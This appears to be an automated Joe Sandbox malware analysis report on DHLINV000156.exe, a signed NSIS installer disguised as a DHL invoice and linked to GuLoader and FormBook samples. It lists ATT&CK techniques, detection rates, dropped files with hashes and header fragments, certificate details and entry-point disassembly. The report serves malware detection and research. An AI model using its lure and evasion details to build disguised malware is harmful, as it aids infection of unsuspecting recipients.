      Source: C:\Users\user\Desktop\DHLINV000156.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
      Source: C:\Users\user\Desktop\DHLINV000156.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
      Source: DHLINV000156.exeBinary or memory string: qEmU&f
      Source: C:\Users\user\Desktop\DHLINV000156.exeCode function: 0_2_73EF1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_73EF1A98
      Source: C:\Users\user\Desktop\DHLINV000156.exeCode function: 0_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403235
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Native API
      Path Interception1
      Access Token Manipulation
      1
      Masquerading
      OS Credential Dumping11
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      Exfiltration Over Other Network Medium1
      Encrypted Channel
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      System Shutdown/Reboot
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Access Token Manipulation
      LSASS Memory3
      File and Directory Discovery
      Remote Desktop Protocol1
      Clipboard Data
      Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
      Timestomp
      Security Account Manager13
      System Information Discovery
      SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
      Obfuscated Files or Information
      NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      DHLINV000156.exe23%ReversingLabsWin32.Trojan.Generic
      DHLINV000156.exe22%VirustotalBrowse
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Glitteringly\pinckneya\Administrerbarest\Fyringssedlens\SolutionExplorerCLI.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Glitteringly\pinckneya\Administrerbarest\Fyringssedlens\SolutionExplorerCLI.dll0%VirustotalBrowse
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede\libpkcs11-helper-1.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede\libpkcs11-helper-1.dll0%VirustotalBrowse
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede\maintenanceservice2.exe0%ReversingLabs
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede\maintenanceservice2.exe0%VirustotalBrowse
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede\percentile.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Styringsmidlernes\Pinkfishes109\Supersensitizations172\Smaskforvirrede\percentile.dll0%VirustotalBrowse
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Supergallantness\afstres\Archives\Sadelmagernaalenes\System.Security.Cryptography.X509Certificates.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\internuptial\Smertelig\Registrer\System.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\internuptial\Smertelig\Registrer\libdatrie-1.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\nsf4536.tmp\System.dll0%ReversingLabs
      SourceDetectionScannerLabelLinkDownload
      0.2.DHLINV000156.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
      0.0.DHLINV000156.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://mozilla.org00%URL Reputationsafe
      https://mozilla.org00%URL Reputationsafe
      http://ocsp.thawte.com00%URL Reputationsafe
      No contacted domains info
      NameSourceMaliciousAntivirus DetectionReputation
      http://nsis.sf.net/NSIS_ErrorDHLINV000156.exefalse
        high
        http://nsis.sf.net/NSIS_ErrorErrorDHLINV000156.exefalse
          high
          https://aka.ms/dotnet-warnings/DHLINV000156.exe, 00000000.00000003.256068695.00000000027CC000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.0.drfalse
            high
            http://crl.thawte.com/ThawteTimestampingCA.crl0DHLINV000156.exe, 00000000.00000003.255493306.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.0.drfalse
              high
              http://www.symauth.com/cps0(DHLINV000156.exe, 00000000.00000003.255493306.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.0.drfalse
                high
                http://www.symauth.com/rpa00DHLINV000156.exe, 00000000.00000003.255493306.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.0.drfalse
                  high
                  https://mozilla.org0DHLINV000156.exe, 00000000.00000003.257110703.00000000027C9000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://ocsp.thawte.com0DHLINV000156.exe, 00000000.00000003.255493306.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.0.drfalse
                  • URL Reputation: safe
                  unknown
                  http://www.nero.comDHLINV000156.exe, 00000000.00000003.255493306.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.0.drfalse
                    high
                    https://github.com/dotnet/runtimeDHLINV000156.exe, 00000000.00000003.256339747.00000000027C1000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000000.00000003.256068695.00000000027CC000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.0.dr, System.dll.0.drfalse
                      high
                      No contacted IP infos
                      Joe Sandbox Version:37.0.0 Beryl
                      Analysis ID:830443
                      Start date and time:2023-03-20 11:36:15 +01:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 8m 38s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:15
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample file name:DHLINV000156.exe
                      Detection:MAL
                      Classification:mal64.troj.evad.winEXE@1/10@0/0
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 63.3% (good quality ratio 62%)
                      • Quality average: 89.3%
                      • Quality standard deviation: 21.3%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 53
                      • Number of non-executed functions: 30
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240s for sample files taking high CPU consumption
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
                      • Not all processes where analyzed, report is missing behavior information
                      TimeTypeDescription
                      11:37:12API Interceptor1x Sleep call for process: DHLINV000156.exe modified
                      No context
                      No context
                      No context
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Glitteringly\pinckneya\Administrerbarest\Fyringssedlens\SolutionExplorerCLI.dllDHLIN00178.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        DHLIN00178.exeGet hashmaliciousGuLoaderBrowse
                          EXFZCd3tg9.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            EXFZCd3tg9.exeGet hashmaliciousGuLoaderBrowse
                              Company Profile.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                Company Profile.exeGet hashmaliciousGuLoaderBrowse
                                  Company Profile.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    Company Profile.exeGet hashmaliciousGuLoaderBrowse
                                      Process:C:\Users\user\Desktop\DHLINV000156.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):257335
                                      Entropy (8bit):7.2826392494429175
                                      Encrypted:false
                                      SSDEEP:6144:oUf41w76GaZg+f3kqYlmWwgN9ST+oR9nNyBCjzDb:Vfcw7Lag8ElRp9wJyk3Db
                                      MD5:A91E61BC886E6E67E5441F96377A9B0C
                                      SHA1:4A3D5D529C0328EED76371ED3A36D10684227303
                                      SHA-256:4DC27F3A2440B1826B4E1BFE993BEE9D647F4789D775B612439F55EC76D55044
                                      SHA-512:FCDFCBCACD8115866F29D273A6561AE5E015C7F3616D7F7FE09D4865EC1E70B7DD1FF1A4BB9C4123CF0339C846030D8BE0E1F005CE707CB81925639E7C14DC79
                                      Malicious:false
                                      Reputation:low
                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\DHLINV000156.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:dropped
                                      Size (bytes):75512
                                      Entropy (8bit):2.680395278497968
                                      Encrypted:false
                                      SSDEEP:1536:yv2XdmPwwnBCTEHke5XYnaswxUSErZJqXKSDgiumhUocp3:0BPAzp3
                                      MD5:06284E5EABF1CB10DA1D5C6C6B64EACB
                                      SHA1:E8430493BC1415193507E442B4596F819BE5256B
                                      SHA-256:0805F6DC1F08E82F6A7C397C19DC33E63B3EAA770F735829FB3E15EE7B344CE6
                                      SHA-512:5E918BEB4D036CB1B8F3A5E8DA99771EF8D91580F06E8F03E53EE387E956A78B2A4A67FF0B0C6FAA72B566265D07E4F448DE6186DEF2BB1C57C785CE1DC947BC
                                      Malicious:false
                                      Reputation:low
                                      Preview:004500000000000000D60000C30000000E00D7D7D7D700DB00004400E5000000000041005D00B7000000EB0000000000000000ED00BCBCBC000000009D9D9D00000000000048006A00222222220000B3B3B300484800003700001919190000CF00000000A60000EC00666600B3B3B3000009000009004C4C006600004E000000EAEAEAEA0000CFCFCF003A3A3A3A004848000E00000000009C9C9C00000000757575000F000000000600FF0000C9C9000000000068680000D9D9D900A8A8A80000000016009C00000000000000E9E900009797970032320000D4D40008004B001900DB00BABA00C2000000858500A30000454500000000001C00000000D4D4D40000383800006600ECECECECECECECEC00EF00000000970032000D0D0000A0A000CB001212000023230000001400000000000000000000000000000000320000008A8A8A000000000041002828006565005200007D7D0000000006060000000000E4E4E400AB0000003E00FA000005050000000000006464006D00000000000084840000585800A40000A1A1A1000A00008100292929009C0000DCDCDCDC002C2C00BCBC00004C000026006D00B7005200A7A7A7000000AFAFAF000000DB00670000000606007C7C00008400D4D4D4D40000424242008E8E006D6D00C30000F1F1F10000000000B900E200000000000000008E00
                                      Process:C:\Users\user\Desktop\DHLINV000156.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):75248
                                      Entropy (8bit):6.149004775364808
                                      Encrypted:false
                                      SSDEEP:1536:GmY7dQU8l75gS4SqQR27YZW1cwvbTxUd6Rw:GmacliS49QR27YZW1vn2dWw
                                      MD5:3A03B61FA01DCDFF3E595D279F159D6E
                                      SHA1:94900C28C23AD01D311C389A0813277CFB30345C
                                      SHA-256:4F4D6511BEC955B4E8A30371ED743EA5EBC87CEB0BF93FE21F0A378AA2C05A01
                                      SHA-512:0D04D3486911DFE0439449554E90FB68B4D85EEE025A9B89910C306DE33CBFDBBEF1ABCAC5D4CD3B3CC1B1F445B7C67DC341C9363C9B127810ABD0498EC94AC4
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Joe Sandbox View:
                                      • Filename: DHLIN00178.exe, Detection: malicious, Browse
                                      • Filename: DHLIN00178.exe, Detection: malicious, Browse
                                      • Filename: EXFZCd3tg9.exe, Detection: malicious, Browse
                                      • Filename: EXFZCd3tg9.exe, Detection: malicious, Browse
                                      • Filename: Company Profile.exe, Detection: malicious, Browse
                                      • Filename: Company Profile.exe, Detection: malicious, Browse
                                      • Filename: Company Profile.exe, Detection: malicious, Browse
                                      • Filename: Company Profile.exe, Detection: malicious, Browse
                                      Reputation:low
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T..:..:..:....:.....:..;..:..]..:..]...:..]..:..]...:..u...:..u..:....:..u...:.Rich.:.........PE..L...w..U...........!.....:..........dG.......P...............................@.......p....@.................................<...P.... .......................0.......P..8............................R..@............P..............(Q..H............text...!8.......:.................. ..`.rdata......P.......>..............@..@.data...............................@....rsrc........ ......................@..@.reloc.. ....0......................@..B................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\DHLINV000156.exe
                                      File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                      Category:dropped
                                      Size (bytes):130344
                                      Entropy (8bit):6.2622011397185
                                      Encrypted:false
                                      SSDEEP:3072:tKInqqVjbm+1Vi5R6QQU7k1TAH1OobTrWHEE+jFpCOx:tVzjvi5R6QQU7k1TAH1OobTrWHExFpdx
                                      MD5:2455841538BA8A502398C18781CC3CEB
                                      SHA1:86CFD513FEE46EBC2C35225B27372679BE6ADA91
                                      SHA-256:F37BE7BD8C46D58CA931810536C8A2BEC36D06FF3281740FE0AD177F022AC781
                                      SHA-512:BC1DCDDE074150616DED7EAACC3FC44BDD2487EB5E550172F5EA46432AA76F19443A9FD6CEF61577B7803C1B083FFCBCEAF9ADC3114A97B547A78C2654F757E3
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Reputation:low
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................&"....."....................\d.............................P......z.....`... .................................................X....0..................x....@.............................. ..(.......................P............................text...8!......."..................`.P`.data........@.......&..............@.`..rdata...^...P...`...(..............@.`@.pdata..............................@.0@.xdata..............................@.0@.bss..................................`..edata..............................@.0@.idata..X...........................@.0..CRT....X...........................@.@..tls....h.... ......................@.`..rsrc........0......................@.0..reloc.......@......................@.0B................................................................................................................................
                                      Process:C:\Users\user\Desktop\DHLINV000156.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):227256
                                      Entropy (8bit):6.388677533277947
                                      Encrypted:false
                                      SSDEEP:6144:ue/rKQgYva3o4vj272BNvIJuQlf2qIHL2:uYrK4a3PvKw7ufg2
                                      MD5:49A2E97304EF8E044EEBD7ACCAD37E11
                                      SHA1:7D0F26591C8BD4CAB1718E323B65706CBEA5DE7A
                                      SHA-256:83EAFBF165642C563CD468D12BC85E3A9BAEDE084E5B18F99466E071149FD15F
                                      SHA-512:AC206C5EF6F373A0005902D09110A95A7F5FB4F524653D30C3A65182717272FE244694A6698D40884BEA243B2CA00D7741CED796DF7AE8C633F513B8C6FCD6C8
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Reputation:moderate, very likely benign file
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...J..b.........."......:.....................@....................................Y.....`..................................................................`..h....X..........................................(....P..............(...h............................text....9.......:.................. ..`.rdata.......P.......>..............@..@.data....!...0......................@....pdata..h....`.......*..............@..@.00cfg...............D..............@..@.tls.................F..............@....rsrc................H..............@..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\DHLINV000156.exe
                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):102577
                                      Entropy (8bit):5.075179901575448
                                      Encrypted:false
                                      SSDEEP:768:t9H5uXFjJeEoPsznZgkZNhFdS2E0fVnSdNPfZ5+uKIu7aQzTgp37CtHRMX6NX0:tJ5wJeEoU9g0Nhav09nahfYxDRx0
                                      MD5:3144FDFEC817D0AC6FE3F4642B70328B
                                      SHA1:756C3513DC10CF00B517C72B2D3AB3E20895A46C
                                      SHA-256:BF17F5B38DCF35B55B1E0FAD462D4095ABAAA4CD8F1EDBDC8657C0249EF5D4D3
                                      SHA-512:012D9A3B88BA5D5090E8B47B49FE50E518489AB05FAAC6A1A0743F29A369B7D67F39B8E113B34740607137F2D67D75116DBE2A76E8E1DBE699BA4973F8037684
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...rL.`.<........& ...$.....6......P................................................U....`... .........................................Y....................P..................`............................A..(....................................................text...............................`.P`.data...p....0....... ..............@.P..rdata..p....@......."..............@.`@.pdata.......P.......*..............@.0@.xdata..l....`......................@.0@.bss.........p........................`..edata..Y............0..............@.0@.idata...............2..............@.0..CRT....X............6..............@.@..tls.................8..............@.@..reloc..`............:..............@.0B/4...................<..............@.PB/19.....C............@..............@..B/31..........`......................@..B/45.............. ..................@..B/57.....
                                      Process:C:\Users\user\Desktop\DHLINV000156.exe
                                      File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):485488
                                      Entropy (8bit):6.710350474742332
                                      Encrypted:false
                                      SSDEEP:6144:1E5AW+0VyAaOKxFf8r6S2rGjF0KAmdHCKsCZcufvh7OzxQxQ5JVIRVrk:KGWlaOKC2a0tmFChCOFeqLIRpk
                                      MD5:84D7B1FB924AEEFCF4A2C7A687FE2EF1
                                      SHA1:A2C2C7DE9096328A3FEF0C7FCEA262A294C0807B
                                      SHA-256:32A54C24B18B3C087E06F4F19885FB410304AB4AF2263154020D3F5CDCE36D99
                                      SHA-512:E75F91DA415B15CA0B19519179021FD88C0FC68FE4EF2A68B899B121BD511C04AECCB58101318C86CB0458D7310208C358DBB9155A02D62DE73C04128ECC5934
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....fW..........." .........................................................`............`...@......@............... ...........................................1...D..p$...P.......0..T...............................................................H............text.............................. ..`.data...wy.......z..................@....reloc.......P.......:..............@..B............................................0...........................T.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O...................y.........?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.
                                      Process:C:\Users\user\Desktop\DHLINV000156.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):49768
                                      Entropy (8bit):5.650496280667822
                                      Encrypted:false
                                      SSDEEP:768:4vuoy1c6A2ZX8TRNH5JVbOd502zq1TntV5fljM:4vuoO3ZX8Q5jzC35NjM
                                      MD5:BCC32F5B608C99F89508921B6333B329
                                      SHA1:5F70BB4A3A812C399D8D2A2954C9A715574CFF61
                                      SHA-256:5D4FF9A8E3B3CA26F53CD2CC4C557C5F2074A431B9CD029AE7F7A7B8902FA3C1
                                      SHA-512:99C7623BCA873C75A3B804C815DF178ACC88E043A36473C785216CD26DC73F0525FE336F17F0F2C8CA6473FBD407A953D4650D093C52440D93ECF07C1440FAB6
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\internuptial\Smertelig\Registrer\System.dll, Author: Joe Security
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... ....................................`.....................................O.......................h$.............T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......P ......................`.......................................BSJB............v4.0.30319......l...$;..#~...;...R..#Strings....4.......#US.8.......#GUID...H.......#Blob............T.........3................................/......................=.....=....J=...=......V...}.....h.. ..... ..... ..J.. ..... ..... ..... ..1.. ..j.. .., AF..a.AF.....R..e..=.................;.....;.....;..)..;..1..;..9..;..A..;..I..;..Q..;..Y..;..a..;..i..;..q..;..y..;.....; ....;.....;..
                                      Process:C:\Users\user\Desktop\DHLINV000156.exe
                                      File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                      Category:dropped
                                      Size (bytes):36029
                                      Entropy (8bit):5.699900454607003
                                      Encrypted:false
                                      SSDEEP:768:Hm5z53y6m/LHlM6GnPGUvMrsztd/sLLhF3VI:a53y6Gy6GuU5d/OhF3G
                                      MD5:8A54723090530190EB11AFCD5B702B1B
                                      SHA1:DFA923EC796A754BD21C4F9E504305848A4CB1B2
                                      SHA-256:738F67F45FAA07CC387BAF390604EE4CE709CBE7C223D9A043EE06F7CB360D5B
                                      SHA-512:E0D310458C8259112E07B153EDC86FDFF29E1B09648FED8D163D44DEB3BEE1545E7AD37BB00E9255DF6514844B21A829750848DA42F85FA77BEF376CE09750CF
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...........<.....&".....R..........0..........h.....................................^........ .................................................................................`...............................(....................................................text...HP.......R..................`.P`.data........p.......V..............@.P..rdata...............X..............@.`@.pdata...............b..............@.0@.xdata...............j..............@.0@.bss.... .............................`..edata...............r..............@.0@.idata...............v..............@.0..CRT....X............~..............@.@..tls................................@.@..reloc..`...........................@.0B........................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\DHLINV000156.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):11776
                                      Entropy (8bit):5.854901984552606
                                      Encrypted:false
                                      SSDEEP:192:qPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4U:F7VpNo8gmOyRsVc4
                                      MD5:0063D48AFE5A0CDC02833145667B6641
                                      SHA1:E7EB614805D183ECB1127C62DECB1A6BE1B4F7A8
                                      SHA-256:AC9DFE3B35EA4B8932536ED7406C29A432976B685CC5322F94EF93DF920FEDE7
                                      SHA-512:71CBBCAEB345E09306E368717EA0503FE8DF485BE2E95200FEBC61BCD8BA74FB4211CD263C232F148C0123F6C6F2E3FD4EA20BDECC4070F5208C35C6920240F0
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L......]...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit):7.597743551355423
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:DHLINV000156.exe
                                      File size:800224
                                      MD5:4cef4c9b4785b2bc5adcbf1c91185ab9
                                      SHA1:5e00a720edff53c27a6ee5fe4606a42cc2ab3a02
                                      SHA256:0a83a6c897b43357c341190cc93e0310cc8063f4e569853aba1c912ede95229f
                                      SHA512:efae339a37af259aa445015dd022beaec68fab00170615beccbed38af7bbc7bfbf874daa5f1426c85fb2856900f266141485cb2dd84108e074c9716686a59ca7
                                      SSDEEP:12288:myiYQS2zqcAMFVJV6xYaU/XnKcZnY4UKwp7hVOZCbgjvwr:ZiYG/FVD6WHicUNEZCbgjG
                                      TLSH:19051297A2618296FDE74BB0193B8D2902777E7A7DB2C54F26A577B21FB32C20017407
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L......].................`..........52.......p....@
                                      Icon Hash:4501012101010100
                                      Entrypoint:0x403235
                                      Entrypoint Section:.text
                                      Digitally signed:true
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x5DF6D4E3 [Mon Dec 16 00:50:43 2019 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:e9c0657252137ac61c1eeeba4c021000
                                      Signature Valid:false
                                      Signature Issuer:E=Disambiguations@acropora.Gav, OU="Underprioriteres Interessekonflikter ", O=Nontrigonometrical, L=Mahaffey, S=Pennsylvania, C=US
                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                      Error Number:-2146762487
                                      Not Before, Not After
                                      • 2/6/2023 12:11:54 AM 2/5/2026 12:11:54 AM
                                      Subject Chain
                                      • E=Disambiguations@acropora.Gav, OU="Underprioriteres Interessekonflikter ", O=Nontrigonometrical, L=Mahaffey, S=Pennsylvania, C=US
                                      Version:3
                                      Thumbprint MD5:7AA203D6AB689907A6C41BAEE5BDC189
                                      Thumbprint SHA-1:4DDF250E49818DE396B187AD3A3F34130F0E4D5A
                                      Thumbprint SHA-256:B577E1E8F47010ED802D38B4B8E5E3E1CE2B6005A883A5BB8D225D3AD933F1AC
                                      Serial:4E44313213E3991CC4F5945A8D82C0D78DD7307E
                                      Instruction
                                      sub esp, 00000184h
                                      push ebx
                                      push esi
                                      push edi
                                      xor ebx, ebx
                                      push 00008001h
                                      mov dword ptr [esp+18h], ebx
                                      mov dword ptr [esp+10h], 00409198h
                                      mov dword ptr [esp+20h], ebx
                                      mov byte ptr [esp+14h], 00000020h
                                      call dword ptr [004070A0h]
                                      call dword ptr [0040709Ch]
                                      and eax, BFFFFFFFh
                                      cmp ax, 00000006h
                                      mov dword ptr [0042370Ch], eax
                                      je 00007F19289E3183h
                                      push ebx
                                      call 00007F19289E626Bh
                                      cmp eax, ebx
                                      je 00007F19289E3179h
                                      push 00000C00h
                                      call eax
                                      mov esi, 00407298h
                                      push esi
                                      call 00007F19289E61E7h
                                      push esi
                                      call dword ptr [00407098h]
                                      lea esi, dword ptr [esi+eax+01h]
                                      cmp byte ptr [esi], bl
                                      jne 00007F19289E315Dh
                                      push 0000000Ah
                                      call 00007F19289E623Fh
                                      push 00000008h
                                      call 00007F19289E6238h
                                      push 00000006h
